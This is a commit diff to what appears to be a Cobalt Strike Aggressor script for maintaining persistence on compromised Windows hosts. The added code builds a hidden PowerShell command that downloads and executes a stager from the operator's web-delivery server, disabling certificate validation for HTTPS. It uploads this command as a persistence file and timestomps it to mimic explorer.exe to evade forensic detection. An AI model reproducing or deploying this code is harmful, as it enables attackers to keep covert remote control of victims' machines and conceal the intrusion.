parent
bc44ca53b2
commit
677cdc9060
|
@ -94,17 +94,31 @@ alias persistence {
|
||||||
########### Subroutines #############
|
########### Subroutines #############
|
||||||
sub checkPSpayload{
|
sub checkPSpayload{
|
||||||
foreach $site (sites()) {
|
foreach $site (sites()) {
|
||||||
if ($site['Description'] eq "PowerShell Web Delivery"){
|
# Site description was updated in CS 3.X from "PowerShell Web Delivery" to "Scripted Web Delivery (powershell)"
|
||||||
|
if ($site['Description'] eq "Scripted Web Delivery (powershell)"){
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
sub uploadPSpayload {
|
sub uploadPSpayload {
|
||||||
foreach $site (sites()) {
|
foreach $site (sites()) {
|
||||||
if ($site['Description'] eq "PowerShell Web Delivery"){
|
if ($site['Description'] eq "Scripted Web Delivery (powershell)"){
|
||||||
$downloadstring = "http://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
|
if ($site['Port'] eq '443' ){
|
||||||
$data = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
|
binput($1, "[*] Using HTTPS Powershell Stager");
|
||||||
bupload_raw($1, $payloadPath, $data);
|
# Modified to allow staging over HTTPs if a self-signed cert is used
|
||||||
|
# Add HTTPS over HTTP
|
||||||
|
$downloadstring = "https://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
|
||||||
|
# Disable certficate validation checking
|
||||||
|
$data = 'powershell.exe -nop -w hidden -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};';
|
||||||
|
$data = $data . "IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$downloadstring = "http://" . $site['Host'] . ":" . $site['Port'] . $site['URI'];
|
||||||
|
$data = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\'" . $downloadstring . "\'))\"";
|
||||||
|
}
|
||||||
|
binput($1, "[*] Attempting to upload persistence file: $2");
|
||||||
|
bupload_raw($1, $2, $data);
|
||||||
|
btimestomp($1,$2,'C:\Windows\explorer.exe')
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue